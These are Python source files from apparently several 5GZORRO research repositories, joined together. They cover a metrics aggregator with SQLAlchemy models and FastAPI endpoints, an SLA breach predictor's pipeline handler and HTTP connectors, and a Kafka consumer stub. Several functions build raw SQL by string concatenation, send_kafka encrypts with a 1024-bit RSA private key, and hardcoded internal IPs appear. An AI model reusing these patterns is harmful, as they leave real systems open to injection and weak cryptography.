engine = create_engine('postgresql+psycopg2://' + POSTGRES_USER + ':' + POSTGRES_PASSWORD + '@' + POSTGRES_HOST + ':' + POSTGRES_PORT + '/' + POSTGRES_DB, pool_size=num_fetch_threads+num_fetch_threads_agg, convert_unicode=True)
# Create database if it does not exist.
if not database_exists(engine.url):
create_database(engine.url)
db_session = scoped_session(sessionmaker(autocommit=False, autoflush=False, bind=engine))
Base = declarative_base()
Base.query = db_session.query_property()
class Config(Base):
__tablename__ = 'config'
_id = Column(postgresql.UUID(as_uuid=True), primary_key=True, default=uuid.uuid4, unique=True)
created_at = Column(DateTime, default=datetime.datetime.now)
updated_at = Column(DateTime, nullable=True)
transaction_id = Column(String(256), nullable=False)
instance_id = Column(String(256), nullable=True)
product_id = Column(String(256), nullable=True)
kafka_topic = Column(String(256), nullable=False)
monitoring_endpoint = Column(String(256), nullable=False)
network_slice_id = Column(String(256), nullable=True)
tenant_id = Column(String(256), nullable=False)
resource_id = Column(String(256), nullable=False)
parent_id = Column(String(256), nullable=True)
timestamp_start = Column(DateTime, nullable=False)
timestamp_end = Column(DateTime, nullable=True)
status = Column(Integer, default=1)
metrics = relationship("Metric")
def __init__(self, transaction_id, kafka_topic, network_slice_id, timestamp_start, timestamp_end, tenant_id, resource_id, parent_id, monitoring_endpoint, instance_id, product_id):
self.transaction_id = transaction_id
self.instance_id = instance_id
self.product_id = product_id
self.kafka_topic = kafka_topic
self.network_slice_id = network_slice_id
self.timestamp_start = timestamp_start
self.timestamp_end = timestamp_end
self.tenant_id = tenant_id
self.resource_id = resource_id
self.parent_id = parent_id
self.monitoring_endpoint = monitoring_endpoint
def toString(self):
return ({'id': self._id,
'created_at': self.created_at,
'updated_at': self.updated_at,
'transaction_id': self.transaction_id,
'instance_id': self.instance_id,
'product_id': self.product_id,
'topic': self.kafka_topic,
'monitoring_endpoint': self.monitoring_endpoint,
'timestamp_start': self.timestamp_start,
'timestamp_end': self.timestamp_end,
'metrics': [],
'status': self.status,
'tenant_id' : self.tenant_id,
'context_ids': [
{
'resource_id': self.resource_id,
'network_slice_id': self.network_slice_id,
'parent_id' : self.parent_id
}
]})
class Metric(Base):
__tablename__ = 'metric'
_id = Column(postgresql.UUID(as_uuid=True), primary_key=True, default=uuid.uuid4, unique=True)
config_id = Column(postgresql.UUID(as_uuid=True), ForeignKey('config._id'))
metric_name = Column(String(256), nullable=False)
metric_type = Column(String(256), nullable=False)
aggregation_method = Column(String(256), nullable=True)
step = Column(String(256), nullable=False)
step_aggregation = Column(String(256), nullable=True)
next_run_at = Column(DateTime, nullable=False)
next_aggregation = Column(DateTime, nullable=True)
status = Column(Integer, default=1)
values = relationship("Value", cascade="all, delete")
def __init__(self, metric_name, metric_type, aggregation_method, step, step_aggregation, config_id, next_run_at, next_aggregation):
self.metric_name = metric_name
self.metric_type = metric_type
self.aggregation_method = aggregation_method
self.step = step
self.step_aggregation = step_aggregation
self.config_id = config_id
self.next_run_at = next_run_at
self.next_aggregation = next_aggregation
def toString(self):
return ({'metric_name': self.metric_name,
'metric_type': self.metric_type,
'aggregation_method': self.aggregation_method,
'step': self.step,
'step_aggregation': self.step_aggregation,
'next_run_at': self.next_run_at,
'next_aggregation': self.next_aggregation})
class Value(Base):
__tablename__ = 'value'
timestamp = Column(DateTime, nullable=False, primary_key=True)
metric_id = Column(postgresql.UUID(as_uuid=True), ForeignKey('metric._id'), primary_key=True)
metric_value = Column(Float, nullable=False)
def __init__(self, timestamp, metric_id, metric_value):
self.timestamp = timestamp
self.metric_id = metric_id
self.metric_value = metric_value
# ----------------------------------------------------------------#
seconds_per_unit = {"s": 1, "m": 60, "h": 3600, "d": 86400, "w": 604800}
def convert_to_seconds(s):
return int(s[:-1]) * seconds_per_unit[s[-1]]
def add_config(config: Config_Model, orchestrator, aggregator):
try:
row = Config(config.transaction_id, config.topic, config.context_ids[0].network_slice_id, config.timestamp_start, config.timestamp_end, config.tenant_id, config.context_ids[0].resource_id, config.context_ids[0].parent_id, config.monitoring_endpoint, config.instance_id, config.product_id)
db_session.add(row)
db_session.commit()
response = row.toString()
for metric in config.metrics:
aggregation = None
if metric.step_aggregation != None:
sec_to_add = convert_to_seconds(metric.step_aggregation)
aggregation = row.timestamp_start + relativedelta(seconds=sec_to_add)
row_m = Metric(metric.metric_name, metric.metric_type, metric.aggregation_method, metric.step, metric.step_aggregation, row._id, row.timestamp_start, aggregation)
db_session.add(row_m)
db_session.commit()
# Add to queue
orchestrator.wait_queue.put((row_m.next_run_at, row.timestamp_start, row_m.step, row.timestamp_end, row_m._id, row_m.metric_name, row_m.metric_type, row_m.aggregation_method, row.transaction_id, row.kafka_topic, row.network_slice_id, row.tenant_id, row.resource_id, row_m.step_aggregation, row_m.next_aggregation, row.monitoring_endpoint, config.instance_id, config.product_id))
if row_m.aggregation_method != None:
aggregator.wait_queue_agg.put((row_m.next_aggregation, row.timestamp_start, row_m.step, row.timestamp_end, row_m._id, row_m.metric_name, row_m.metric_type, row_m.aggregation_method, row.transaction_id, row.kafka_topic, row.network_slice_id, row.tenant_id, row.resource_id, row_m.step_aggregation, row_m.next_aggregation, config.instance_id, config.product_id))
response['metrics'].append(row_m.toString())
return response
except Exception as e:
print(e)
return -1
def get_config(config_id):
try:
config = Config.query.filter_by(_id=config_id).first()
if config == None:
return 0
response = config.toString()
metrics = Metric.query.filter_by(config_id=config_id).all()
[response['metrics'].append(metric.toString()) for metric in metrics]
return response
except Exception as e:
print(e)
return -1
def get_configs():
try:
configs = Config.query.all()
response = []
for config in configs:
add_metrics = config.toString()
metrics = Metric.query.filter_by(config_id=config._id).all()
[add_metrics['metrics'].append(metric.toString()) for metric in metrics]
response.append(add_metrics)
return response
except Exception as e:
print(e)
return -1
def delete_metric_queue(metric_id, orchestrator, aggregator):
index = True
while(index):
index = False
for i in range(len(orchestrator.wait_queue.queue)):
if orchestrator.wait_queue.queue[i][4] == metric_id:
del orchestrator.wait_queue.queue[i]
index = True
break
for i in range(len(aggregator.wait_queue_agg.queue)):
if aggregator.wait_queue_agg.queue[i][4] == metric_id:
del aggregator.wait_queue_agg.queue[i]
index = True
break
for i in range(len(orchestrator.metrics_queue.queue)):
if orchestrator.metrics_queue.queue[i][4] == metric_id:
del orchestrator.metrics_queue.queue[i]
index = True
break
for i in range(len(aggregator.aggregation_queue.queue)):
if aggregator.aggregation_queue.queue[i][4] == metric_id:
del aggregator.aggregation_queue.queue[i]
index = True
break
return
def update_config(config_id, config, orchestrator, aggregator):
try:
row = Config.query.filter_by(_id=config_id).first()
if row == None:
return 0
if config.timestamp_end == None and config.metrics == None:
return 1
if config.timestamp_end != None and row.timestamp_end != None and config.timestamp_end <= row.timestamp_end:
return 2
now = datetime.datetime.now()
row.updated_at = now
# Update config
if config.timestamp_end != None:
row.timestamp_end = config.timestamp_end
db_session.commit()
response = row.toString()
# Update metrics
# Delete old metrics
metrics = Metric.query.filter_by(config_id=config_id).all()
for metric in metrics:
delete_metric_queue(metric._id, orchestrator, aggregator)
db_session.delete(metric)
if config.metrics != None:
#Create new metrics
for metric in config.metrics:
aggregation = None
if metric.step_aggregation != None:
sec_to_add = convert_to_seconds(metric.step_aggregation)
aggregation = now + relativedelta(seconds=sec_to_add)
row_m = Metric(metric.metric_name, metric.metric_type, metric.aggregation_method, metric.step, metric.step_aggregation, row._id, now, aggregation)
db_session.add(row_m)
db_session.commit()
# Add to queue
orchestrator.wait_queue.put((row_m.next_run_at, row.timestamp_start, row_m.step, row.timestamp_end, row_m._id, row_m.metric_name, row_m.metric_type, row_m.aggregation_method, row.transaction_id, row.kafka_topic, row.network_slice_id, row.tenant_id, row.resource_id, row_m.step_aggregation, row_m.next_aggregation, row.monitoring_endpoint, config.instance_id, config.product_id))
if row_m.aggregation_method != None:
aggregator.wait_queue_agg.put((row_m.next_aggregation, row.timestamp_start, row_m.step, row.timestamp_end, row_m._id, row_m.metric_name, row_m.metric_type, row_m.aggregation_method, row.transaction_id, row.kafka_topic, row.network_slice_id, row.tenant_id, row.resource_id, row_m.step_aggregation, row_m.next_aggregation, config.instance_id, config.product_id))
response['metrics'].append(row_m.toString())
return response
return get_config(config_id)
except Exception as e:
print(e)
return -1
def update_next_run(metric_id, next_run_at):
try:
metric = Metric.query.filter_by(_id=metric_id).first()
config = Config.query.filter_by(_id=metric.config_id).first()
sec_to_add = convert_to_seconds(metric.step)
next = next_run_at + relativedelta(seconds=sec_to_add)
if config.timestamp_end != None and next > config.timestamp_end:
metric.status = 0
db_session.commit()
else:
metric.next_run_at = next
db_session.commit()
return 1
except Exception as e:
print(e)
return -1
def update_aggregation(metric_id, next_aggregation):
try:
metric = Metric.query.filter_by(_id=metric_id).first()
config = Config.query.filter_by(_id=metric.config_id).first()
sec_to_add = convert_to_seconds(metric.step_aggregation)
next = next_aggregation + relativedelta(seconds=sec_to_add)
if config.timestamp_end != None and next > config.timestamp_end:
metric.status = 0
db_session.commit()
else:
metric.next_aggregation = next
db_session.commit()
return 1
except Exception as e:
print(e)
return -1
def enable_config(config_id, orchestrator, aggregator):
try:
config = Config.query.filter_by(_id=config_id).first()
if config == None or (config.timestamp_end != None and config.timestamp_end < datetime.datetime.now()):
return 0
if config.status == 1:
return 1
config.status = 1
now = datetime.datetime.now()
config.updated_at = now
add_metrics = config.toString()
metrics = Metric.query.filter_by(config_id=config._id).all()
for metric in metrics:
metric.status = 1
metric.next_run_at = now
orchestrator.wait_queue.put((metric.next_run_at, config.timestamp_start, metric.step, config.timestamp_end, metric._id, metric.metric_name, metric.metric_type, metric.aggregation_method, config.transaction_id, config.kafka_topic, config.network_slice_id, config.tenant_id, config.resource_id, metric.step_aggregation, metric.next_aggregation, config.monitoring_endpoint, config.instance_id, config.product_id))
if metric.aggregation_method != None:
sec_to_add = convert_to_seconds(metric.step_aggregation)
metric.next_aggregation = now + relativedelta(seconds=sec_to_add)
aggregator.wait_queue_agg.put((metric.next_aggregation, config.timestamp_start, metric.step, config.timestamp_end, metric._id, metric.metric_name, metric.metric_type, metric.aggregation_method, config.transaction_id, config.kafka_topic, config.network_slice_id, config.tenant_id, config.resource_id, metric.step_aggregation, metric.next_aggregation, config.instance_id, config.product_id))
add_metrics['metrics'].append(metric.toString())
db_session.commit()
return add_metrics
except Exception as e:
print(e)
return -1
def disable_config(config_id, orchestrator, aggregator):
try:
config = Config.query.filter_by(_id=config_id).first()
if config == None:
return 0
if config.status == 0:
return 1
config.status = 0
config.updated_at = datetime.datetime.now()
add_metrics = config.toString()
metrics = Metric.query.filter_by(config_id=config._id).all()
for metric in metrics:
metric.status = 0
add_metrics['metrics'].append(metric.toString())
delete_metric_queue(metric._id, orchestrator, aggregator)
db_session.commit()
return add_metrics
except Exception as e:
print(e)
return -1
def delete_config(config_id, orchestrator, aggregator):
try:
config = Config.query.filter_by(_id=config_id).first()
if config == None:
return 0
metrics = Metric.query.filter_by(config_id=config._id).all()
for metric in metrics:
delete_metric_queue(metric._id, orchestrator, aggregator)
db_session.delete(metric)
db_session.delete(config)
db_session.commit()
return 1
except Exception as e:
print(e)
return -1
def load_database_metrics(orchestrator, aggregator):
try:
# Update old metrics and next executions
now = datetime.datetime.now()
db_session.execute("UPDATE config " \
"SET status = 0 " \
"WHERE status = 1 AND timestamp_end < '"+str(now)+"'; " \
"UPDATE metric " \
"SET next_run_at = '"+str(now)+"', " \
"next_aggregation = CASE WHEN aggregation_method is not null " \
"THEN '"+str(now)+"'::timestamp + step_aggregation::interval END " \
"FROM config c " \
"WHERE c.status = 1 AND next_run_at < '"+str(now)+"';");
db_session.commit()
# Get metrics
result = db_session.execute("SELECT next_run_at, metric_name, metric_type, aggregation_method, step, transaction_id, instance_id, product_id, kafka_topic, network_slice_id, " \
"tenant_id, resource_id, timestamp_start, timestamp_end, metric._id, step_aggregation, " \
"next_aggregation, monitoring_endpoint " \
"FROM metric join config on metric.config_id = config._id " \
"WHERE metric.status = 1;")
for row in result:
orchestrator.wait_queue.put((row['next_run_at'], row['timestamp_start'], row['step'], row['timestamp_end'], row['_id'], row['metric_name'], row['metric_type'], row['aggregation_method'], row['transaction_id'], row['kafka_topic'], row['network_slice_id'], row['tenant_id'], row['resource_id'], row['step_aggregation'], row['next_aggregation'], row['monitoring_endpoint'], row['instance_id'], row['product_id']))
if row['aggregation_method'] != None:
aggregator.wait_queue_agg.put((row['next_aggregation'], row['timestamp_start'], row['step'], row['timestamp_end'], row['_id'], row['metric_name'], row['metric_type'], row['aggregation_method'], row['transaction_id'], row['kafka_topic'], row['network_slice_id'], row['tenant_id'], row['resource_id'], row['step_aggregation'], row['next_aggregation'], row['instance_id'], row['product_id']))
return 1
except Exception as e:
print(e)
return -1
def insert_metric_value(metric_id, metric_value, timestamp):
try:
row = Value(timestamp, metric_id, metric_value)
db_session.add(row)
db_session.commit()
return 1
except Exception as e:
print(e)
return -1
''' Not used now
def create_aggregate_view(metric_id, aggregation_method, step_aggregation):
global db_session
db_session.execute("CREATE VIEW \"agg_"+str(metric_id)+"_"+aggregation_method+"\" " \
"WITH (timescaledb.continuous) AS " \
"SELECT time_bucket(\'"+step_aggregation+"\', timestamp) AS bucket, "+aggregation_method+"(metric_value) AS aggregation " \
"FROM value " \
"WHERE metric_id = '"+str(metric_id)+"' " \
"GROUP BY bucket;")
db_session.commit()
return
def drop_aggregate_view(metric_id, aggregation_method):
db_session.execute("DROP VIEW IF EXISTS \"agg_"+str(metric_id)+"_"+aggregation_method+"\" CASCADE;")
db_session.commit()
return
'''
def get_last_aggregation(metric_id, aggregation_method, bucket, step_aggregation):
#result = db_session.execute("REFRESH VIEW \"agg_"+str(metric_id)+"_"+aggregation_method+"\";" \
# "SELECT * FROM \""+str(metric_id)+"_"+aggregation_method+"\" LIMIT 1;").fetchone()
result = db_session.execute("SELECT "+aggregation_method+"(metric_value) " \
"FROM value " \
"WHERE metric_id = '"+str(metric_id)+"' and timestamp < '"+str(bucket)+"'::timestamp " \
"and timestamp >= ('"+str(bucket)+"'::timestamp - interval '"+str(step_aggregation)+"');").fetchone()
return result[0]
def create_index():
#db_session.execute("CREATE EXTENSION IF NOT EXISTS timescaledb CASCADE;" \
# "CREATE INDEX value_index ON value (timestamp ASC, metric_id);" \
# "SELECT create_hypertable('value', 'timestamp', if_not_exists => TRUE);")
db_session.execute("CREATE INDEX value_index ON value (timestamp ASC, metric_id);")
db_session.commit()
return
'''
def drop_all_views():
global db_session
result = db_session.execute("SELECT 'DROP VIEW \"' || table_name || '\" CASCADE;' " \
"FROM information_schema.views " \
"WHERE table_schema NOT IN ('pg_catalog', 'information_schema') AND " \
"table_name !~ '^pg_' AND table_name LIKE 'agg_%';")
for row in result:
try:
db_session.execute(row[0])
except Exception:
pass
db_session.commit()
return
'''
def close_connection():
db_session.remove()
return
def reload_connection():
db_session.remove()
db_session = scoped_session(sessionmaker(autocommit=False, autoflush=False, bind=engine))
return
# ----------------------------------------------------------------#
# Reset db if env flag is True
if RESET_DB.lower() == 'true':
try:
try:
db_session.commit()
Base.metadata.drop_all(bind=engine)
except Exception as e:
print(e)
Base.metadata.create_all(bind=engine)
db_session.commit()
create_index()
except Exception as e:
print(e)
sys.exit(0)
# Create db if not exists
try:
resp1 = Config.query.first()
resp2 = Metric.query.first()
resp3 = Value.query.first()
except Exception as e:
try:
Base.metadata.create_all(bind=engine)
db_session.commit()
create_index()
except Exception as e:
print(e)
sys.exit(0)
```
#### File: mda/app/endpoints.py
```python
from .main import *
@app.post("/settings", status_code=201, responses={201: {"model": Response_Config_Model, "content": {"application/json": { "example": json_response_enable}}}, 404: {"model": Response_Error_Model, "content": {"application/json": { "example": {"status": "Error", "message": "Error message."}}}}})
async def set_param(config: Config_Model):
config.data_source_type = config.data_source_type.upper()
if config.data_source_type not in resources_options:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Aggregation step options is "+str(agg_options)+"."})
if config.timestamp_start == None:
config.timestamp_start = datetime.datetime.now()
if config.timestamp_end != None and config.timestamp_start > config.timestamp_end:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Timestamp start need to be after timestamp end."})
for metric in config.metrics:
if metric.aggregation_method != None:
metric.aggregation_method = metric.aggregation_method.upper()
if metric.aggregation_method not in agg_options:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Aggregation step options is "+str(agg_options)+"."})
if metric.step_aggregation != None and metric.step_aggregation[-1] not in step_options and metric.step[-1] not in step_options:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Step and step aggregation options is "+str(step_options)+"."})
# create public/private keys if not created
if config.tenant_id not in public_private_keys:
public_key, private_key = rsa.newkeys(1024)
public_private_keys[config.tenant_id] = {"public_key": public_key, "private_key": private_key}
# Save config in database
resp = add_config(config, orchestrator, aggregator)
if resp == -1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Error in create config in database."})
orchestrator.update_queue_flag = True
aggregator.update_queue_flag_agg = True
info_log(200, f'Monitoring spec successfully created by operator {config.tenant_id}')
return resp
@app.get("/settings/{config_id}", responses={200: {"model": Response_Config_Model, "content": {"application/json": { "example": json_response_enable}}}, 404: {"model": Response_Error_Model, "content": {"application/json": { "example": {"status": "Error", "message": "Error message."}}}}})
async def get_config_id(config_id):
# Get config by id
if validate_uuid4(config_id) is False:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
resp = get_config(config_id)
if resp == 0:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
if resp == -1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Error in get config in database."})
return resp
@app.get("/settings", responses={200: {"model": List[Response_Config_Model], "content": {"application/json": { "example": [json_response_enable]}}}, 404: {"model": Response_Error_Model, "content": {"application/json": { "example": {"status": "Error", "message": "Error message."}}}}})
async def get_all_configs():
# Get configs
resp = get_configs()
if resp == -1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Error in get config in database."})
return resp
@app.put("/settings/{config_id}", responses={200: {"model": Response_Config_Model, "content": {"application/json": { "example": json_response_enable}}}, 404: {"model": Response_Error_Model, "content": {"application/json": { "example": {"status": "Error", "message": "Error message."}}}}})
async def update_config_id(config_id, config: Update_Config_Model):
# Update config by id
if validate_uuid4(config_id) is False:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
resp = update_config(config_id, config, orchestrator, aggregator)
if resp == 0:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
if resp == 1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Arguments invalid."})
if resp == 2:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Timestamp end must be superior to the actual."})
if resp == -1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Error in update config in database."})
orchestrator.update_queue_flag = True
aggregator.update_queue_flag_agg = True
info_log(200, f'Monitoring spec {config_id} successfully updated')
return resp
@app.put("/settings/{config_id}/enable", responses={200: {"model": Response_Config_Model, "content": {"application/json": { "example": json_response_enable}}}, 404: {"model": Response_Error_Model, "content": {"application/json": { "example": {"status": "Error", "message": "Error message."}}}}})
async def enable_config_id(config_id):
# Enable config by id
if validate_uuid4(config_id) is False:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
resp = enable_config(config_id, orchestrator, aggregator)
if resp == 0:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
if resp == 1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config already enabled."})
if resp == -1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Error in enable config in database."})
orchestrator.update_queue_flag = True
aggregator.update_queue_flag_agg = True
info_log(200, f'Monitoring spec {config_id} successfully enabled')
return resp
@app.put("/settings/{config_id}/disable", responses={200: {"model": Response_Config_Model, "content": {"application/json": { "example": json_response_disable}}}, 404: {"model": Response_Error_Model, "content": {"application/json": { "example": {"status": "Error", "message": "Error message."}}}}})
async def disable_config_id(config_id):
# Disable config by id
if validate_uuid4(config_id) is False:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
resp = disable_config(config_id, orchestrator, aggregator)
if resp == 0:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
if resp == 1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config already disabled."})
if resp == -1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Error in disable config in database."})
orchestrator.update_queue_flag = True
aggregator.update_queue_flag_agg = True
info_log(200, f'Monitoring spec {config_id} successfully disabled')
return resp
@app.delete("/settings/{config_id}", status_code=HTTP_204_NO_CONTENT, responses={404: {"model": Response_Error_Model, "content": {"application/json": { "example": {"status": "Error", "message": "Error message."}}}}})
async def delete_config_id(config_id):
# Get config by id
if validate_uuid4(config_id) is False:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
resp = delete_config(config_id, orchestrator, aggregator)
if resp == 0:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Config id invalid."})
if resp == -1:
return JSONResponse(status_code=404, content={"status": "Error", "message": "Error in delete config in database."})
orchestrator.update_queue_flag = True
aggregator.update_queue_flag_agg = True
info_log(200, f'Monitoring spec {config_id} successfully deleted')
return Response(status_code=HTTP_204_NO_CONTENT)
```
#### File: mda/app/utils.py
```python
from .main import *
def info_log(status, message):
logging.critical('"status": "'+str(status)+'", "message": "'+message+'"')
def validate_uuid4(uuid_string):
try:
uuid.UUID(uuid_string).hex
except ValueError:
return False
return True
def send_kafka(data, dataHash, kafka_topic, producer):
try:
payload_encoded = {k: str(v).encode('utf-8') for k, v in dataHash.items()}
hashData = {k: hashlib.sha256(v).hexdigest() for k,v in payload_encoded.items()}
#info_log(None, f'Raw Data: {data} \nHashed Data: {hashData}')
# public and private keys
public_key = public_private_keys[data["operatorID"]]["public_key"]
private_key = public_private_keys[data["operatorID"]]["private_key"]
dataHashEncrypt = {rsa.encrypt(k.encode(), private_key): rsa.encrypt(v.encode(), private_key) for k,v in hashData.items()}
#info_log(None, f'Signup Data: {dataHashEncrypt}')
producer.send(kafka_topic, key=list(dataHashEncrypt.values())[0], value=data)
info_log(200, f'Post metric {data["monitoringData"]["metricName"]}, from operator {data["operatorID"]}, into DL Kafka Topic {kafka_topic} [Post Time: {data["monitoringData"]["timestamp"]}]')
return 1
except Exception as e:
info_log(400, 'Erro in send_kafka: ' + str(e))
return 0
def queue_consumer(thread_identifier, queue, flag_agg, orchestrator, aggregator, producer):
try:
while True:
next_item = queue.get()
if next_item[3] == None or next_item[0] <= next_item[3]:
info_log(None, f'Start Fetching Values of Metric: {next_item[5]} (Thread Associated: {thread_identifier})')
if flag_agg == 1:
#Send aggregation
info_log(None, f'{datetime.datetime.now()} - UC1: Aggregating values from metric: {next_item[5]} (Step Aggregation Associated: {next_item[14]})')
aggregator.send_aggregation(next_item[5], next_item[12], next_item[0], next_item[11], next_item[8], next_item[10], next_item[9], next_item[7], next_item[4], next_item[14], next_item[13], next_item[15], next_item[16], producer)
update_aggregation(next_item[4], next_item[0])
else:
#Send metric
orchestrator.request_orchestrator(next_item[5], next_item[12], next_item[0], next_item[11], next_item[8], next_item[10], next_item[9], next_item[7], next_item[4], next_item[15], next_item[16], next_item[17], producer)
info_log(None, f'{datetime.datetime.now()} - UC2: Fetching values from OSM, metric: {next_item[5]} (Step Associated: {next_item[2]}')
update_next_run(next_item[4], next_item[0])
queue.task_done()
except Exception as e:
print(e)
def delete_old_metric(metric_id, queue):
index = True
while(index):
index = False
if queue == 0:
for i in range(len(orchestrator.metrics_queue.queue)):
if orchestrator.metrics_queue.queue[i][4] == metric_id:
#print('DELETE METRIC -> ' + str(datetime.datetime.now()) + ' -> ' + str(metric_id))
del orchestrator.metrics_queue.queue[i]
index = True
break
else:
for i in range(len(aggregator.aggregation_queue.queue)):
if aggregator.aggregation_queue.queue[i][4] == metric_id:
#print('DELETE AGG -> ' + str(datetime.datetime.now()) + ' -> ' + str(metric_id))
del aggregator.aggregation_queue.queue[i]
index = True
break
return
``` |
{
"source": "5GZORRO/sla-breach-predictor",
"score": 2
} |
#### File: isbp/exceptions/exceptions.py
```python
class AttributeListCannotBeEmptyException(Exception):
def __init__(self, reason = "The list of attributes for Multivariate LSTM cannot be empty."):
self.reason = reason
super().__init__(self.reason)
class WrongNumberOfAttributesException(Exception):
def __init__(self, n_features, list_size):
self.reason = 'Expected number of attributes is ' + n_features + ' but '+ list_size + ' were given.'
super().__init__(self.reason)
class PathNotFoundException(Exception):
def __init__(self, path: str):
self.reason = "Path '"+path+"' was not found."
super().__init__(self.reason)
class OperationNotRegisteredException(Exception):
def __init__(self, operation_id: str):
self.reason = "Operation '"+operation_id+"' was not found in the registry."
super().__init__(self.reason)
class MetricNotFoundException(Exception):
def __init__(self, metric: str):
self.reason = "Metric '"+metric+"' was not found in the data."
super().__init__(self.reason)
```
#### File: isbp/runtime/handler.py
```python
from runtime.active_pipeline import ActivePipeline
from runtime.http_connectors import register_pipeline, get_sla_details
import json
import logging
log = logging.getLogger(__name__)
class Handler():
scaler = None
__active_ops = None
__count = 0
def init():
global __active_ops
global __count
__active_ops = {}
__count = 0
def get_list():
global __active_ops
return __active_ops
def create_new_pipeline(data):
global __active_ops
global __count
slaID = data.get('slaID')
pipeline = __active_ops.get(slaID)
if pipeline is not None:
log.info('Pipeline already exists')
status = 'Pipeline already exists'
else:
try:
sla_details, status = get_sla_details(slaID)
if sla_details is not None:
rule = sla_details.get('rule')[0]
threshold = rule.get('referenceValue')
operator = rule.get('operator')
metric_name = rule.get('metric')
pipeline = ActivePipeline(slaID, threshold, metric_name, operator)
__active_ops[pipeline.slaID] = pipeline
__count = __count + 1
log.info('Created new pipeline with ID: {0}'.format(pipeline.slaID))
register_pipeline(pipeline.slaID)
except Exception as e:
status = str(e)
return pipeline, status
def get_active_pipeline(_id):
global __active_ops
pipeline = __active_ops.get(_id)
return pipeline
def terminate_pipeline(pipeline_id):
global __active_ops
global __count
result = None
status_code = 0
pipeline = __active_ops.get(pipeline_id)
if pipeline is None:
result = 'Pipeline not found.'
status_code = 404
else:
del __active_ops[pipeline_id]
__count = __count - 1
result = 'Pipeline successfully terminated.'
status_code = 200
return result, status_code
def set_prediction(data):
global __active_ops
pipeline_id = data.get('slaID')
prediction = float(data.get('value'))
timestamp = data.get('datetimeViolation')
pipeline = Handler.get_active_pipeline(pipeline_id)
if pipeline is not None:
pipeline.prediction_for_accuracy = prediction
pipeline.prediction_date = timestamp
result = 'Successfully set prediction for ' + pipeline_id
#prediction = Handler.transform(prediction)
else:
result = 'Pipeline not found.'
return result, pipeline, prediction
def get_active_list():
global __active_ops
global __count
result = None
# Initialize an empty list
active_list = {}
if __count < 1:
result = 'No active pipelines.'
else:
for entry in __active_ops:
pipeline = __active_ops.get(entry)
json_object = {'id' : pipeline.slaID,
'name' : pipeline.name,
'description' : pipeline.description,
}
active_list[pipeline.productID] = json_object
result = json.dumps(active_list)
return __count
def get_pipeline(pipeline_id):
global __active_ops
pipeline = __active_ops.get(pipeline_id)
result = None
status_code = 0
if pipeline is not None:
result = {}
result['id'] = pipeline.slaID
result['name'] = pipeline.name
result['description'] = pipeline.description
result = json.dumps(result)
status_code = 200
else:
result = "Pipeline "+"'"+str(pipeline_id)+"' "+"does not exist."
status_code = 404
return result, status_code
```
#### File: isbp/runtime/http_connectors.py
```python
from config.config import Config as cnf
import requests
import json
import logging
params = {'userId' : 'isbp', 'authToken' : '<PASSWORD>'}
def register_app():
global params
register_url = 'http://172.28.3.94:8080/datalake/v1/user'
request = requests.post(register_url, json = params)
if request.status_code == 409:
logging.info('App already registered.Getting information.')
request = requests.get(register_url, json = params)
response = json.loads(request.text)
data_topic = response.get('availableResources').get('topics').get('userInTopic')
kafka_url = response.get('availableResources').get('urls').get('kafka_url').split(':')
cnf.TOPICS.append(data_topic)
cnf.KAFKA_HOST = kafka_url[0]
cnf.KAFKA_PORT = kafka_url[1]
cnf.MON_DATA_TOPIC = data_topic
def register_pipeline(slaID):
global params
register_url = 'http://172.28.3.46:30887/datalake/v1/stream_data/register/'+slaID
token = {'userInfo' : params, 'productInfo' : {'topic' : cnf.MON_DATA_TOPIC}}
request = requests.post(register_url, json = token)
if request.status_code > 200 and request.status_code < 300:
logging.info("Successfully registered pipeline with ID: {0}".format(slaID))
else:
logging.info("Registration failed.")
def get_sla_details(slaID):
sla_url = 'http://172.28.3.6:31080/smart-contract-lifecycle-manager/api/v1/service-level-agreement/'
response = None
request = requests.get(sla_url+slaID)
logging.info('SLA status: {0}'.format(request.status_code))
if request.status_code == 200:
response = json.loads(request.text)
result = 'SLA details successfully retrieved'
else:
result = 'SLA not found or could not be retrieved'
return response, result
``` |
{
"source": "5GZORRO/Trust-management-framework",
"score": 3
} |
#### File: Trust-management-framework/peer_Trust_Model/consumer.py
```python
from kafka import KafkaConsumer
import json
import logging
import time
class Consumer():
consumer = None
name_server = 'kafka:9093'
def start(self):
""" This method initialises a KafkaConsumer reading messages from the beginning """
global consumer
self.consumer = KafkaConsumer(bootstrap_servers='kafka:9093', group_id=None, auto_offset_reset='earliest')
#self.consumer = KafkaConsumer(topic, bootstrap_servers=self.name_servername_server, group_id=None,
#enable_auto_commit=False, auto_offset_reset='earliest')
return self.consumer
def subscribe(self, topics):
"""" This method subscribes the 5G-TRMF to a set of interesting topics. The topics parameter must be a list """
global consumer
try:
self.consumer.subscribe(topics)
return 1
except Exception as e:
return 0
def stop(self):
""" This method finishes a KafkaConsumer connection as well as unsubscribing the topics registered """
global consumer
self.consumer.unsubscribe()
self.consumer.close()
def start_reading(self, data_lock, historical):
""" This method begins to retrieve messages from a KafkaTopic.
IT MUST BE LAUNCHED AS A THREAD TO AVOID BLOCKING THE APP """
logging.basicConfig(level=logging.INFO)
global consumer
for message in self.consumer:
trust_information = json.loads(message.value.decode())
data_lock.acquire()
